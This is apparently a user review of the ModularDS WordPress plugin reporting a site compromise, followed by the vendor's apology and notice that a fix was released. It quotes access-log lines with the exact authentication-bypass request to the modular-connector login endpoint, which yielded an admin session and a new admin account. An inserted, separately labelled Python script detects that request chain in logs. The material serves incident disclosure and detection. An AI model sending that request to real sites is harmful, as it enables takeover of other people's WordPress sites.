Verified purchaser
Plugin is compromised, led to attack on one of my sites
Critical vulnerability in this plugin
I was using this on just a handful of sites the last year or so. I got an alert that an admin user had been created with an obvious fake email address.
After running through the logs I came across this:
Authentication bypass
03:05:38 45.11.89.19 302 GET /api/modular-connector/login/anything?origin=mo&type=foo
The attacker calls the vulnerable ModularDS endpoint. The 302 response is a redirect — but critically, this redirect includes a valid WordPress authentication cookie. No username or password required.
Admin access confirmed
03:05:38 45.11.89.19 200 GET /wp-admin/index.php
Same second. The attacker accesses the WordPress admin dashboard. The 200 response means success — they're now logged in as an administrator.
Navigating to user creation
03:05:39 45.11.89.19 200 GET /wp-admin/user-new.php
The attacker loads the "Add New User" page. This is an automated script.
Creating the malicious account
03:05:39 45.11.89.19 302 POST /wp-admin/user-new.php
The attacker submits the form to create a new admin account. The 302 redirect indicates the form was processed successfully.
Attack complete
03:05:40 45.11.89.19 200 GET /wp-admin/users.php?update=add&id=10
The attacker is redirected to the users list with update=add&id=10 in the URL. This confirms user ID 10 (the "admin5" account) was successfully created.
Total time from first request to full compromise: 2 seconds.
Attacker attempted to use the new account
About 2 minutes after the account was created, a different IP attempted to log in — likely to use the newly created admin5 credentials:
2026-01-14 03:07:34 Access 151.241.30.63 200 GET /wp-login.php HTTP/1.0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1)
2026-01-14 03:07:35 Access 151.241.30.63 200 POST /wp-login.php HTTP/1.0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1)
In my case, the attacker only had approximately 90 seconds of access before I responded. A Wordfence scan confirmed no malware or backdoors were installed. However, if this plugin has been on your site for a while, the attacker may have had more time to cause damage.
The vulnerability appears to be an authentication bypass, which is as serious as it gets. Any site with this plugin installed should be considered potentially compromised.
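To check other sites' access logs for the same sequence, here is a detection sketch. It is an added example, not part of the review and not ModularDS code. It assumes log lines in the "time IP status method path" layout quoted above; the function names, the 60-second window and the sample lines (documentation-range IPs) are constructed for illustration.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

# Constructed sample in the review's "time ip status method path" layout.
SAMPLE = """\
03:05:38 203.0.113.7 302 GET /api/modular-connector/login/anything?origin=mo&type=foo
03:05:38 203.0.113.7 200 GET /wp-admin/index.php
03:05:39 198.51.100.20 302 POST /wp-admin/user-new.php
03:05:39 203.0.113.7 200 GET /wp-admin/user-new.php
03:05:39 203.0.113.7 302 POST /wp-admin/user-new.php
03:05:40 198.51.100.20 200 GET /wp-admin/users.php?update=add&id=9
03:05:40 203.0.113.7 200 GET /wp-admin/users.php?update=add&id=10
03:06:10 192.0.2.44 404 GET /api/modular-connector/login/anything?origin=mo&type=foo
""".splitlines()

LINE = re.compile(r"^(\d{2}:\d{2}:\d{2}) (\S+) (\d{3}) ([A-Z]+) (\S+)$")
ENDPOINT = "/api/modular-connector/login/"  # path seen in the review's log
WINDOW = timedelta(seconds=60)              # assumed correlation window

def parse(lines):
    for raw in lines:
        m = LINE.match(raw.strip())
        if m:  # lines in other layouts are skipped
            t, ip, status, method, target = m.groups()
            yield datetime.strptime(t, "%H:%M:%S"), ip, int(status), method, urlsplit(target)

def find_chains(lines):
    """One finding per IP whose 302 from the endpoint led to a created user."""
    entry, posted, findings = {}, {}, []
    for ts, ip, status, method, url in parse(lines):
        if method == "GET" and status == 302 and url.path.startswith(ENDPOINT):
            entry[ip] = ts           # start of a possible chain for this IP
            posted.pop(ip, None)
        elif ip in entry and timedelta(0) <= ts - entry[ip] <= WINDOW:
            if (method, status, url.path) == ("POST", 302, "/wp-admin/user-new.php"):
                posted[ip] = ts      # user-creation form accepted
            elif ip in posted and url.path == "/wp-admin/users.php":
                q = parse_qs(url.query)
                if q.get("update") == ["add"] and "id" in q:
                    findings.append({"ip": ip, "user_id": q["id"][0],
                                     "seconds": int((ts - entry.pop(ip)).total_seconds())})
                    posted.pop(ip)
    return findings

if __name__ == "__main__":
    for finding in find_chains(SAMPLE):
        print(finding)
```

A finding gives the user ID to audit and remove. A legitimate administrator adding a user (the 198.51.100.20 lines) is not flagged because that IP never received the 302 from the connector endpoint.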
Hector_ModularDS
Jan 30, 2026
Hello myuill,
This is true. There was a vulnerability in our plugin that could lead to issues like this. It was identified on January 14 at 08:30 UTC, and 82 minutes later we released an update that fixed it.
We’re genuinely sorry for the trouble this caused. The good news is that across 40,000+ connected websites, we haven’t received any reports of site damage. The main impact we’ve seen is the creation of an unexpected admin user on a small percentage of sites, like what happened in your case.
For full transparency, we published a detailed post-mortem explaining what happened, how we responded, and what we’re changing to make sure it doesn’t happen again: https://modulards.com/a-post-mortem-on-the-modular-connector-security-incident-january-2026/
Again, we’re sorry you had to deal with this because of us. If you’re open to it, we’d appreciate the chance to earn back your trust.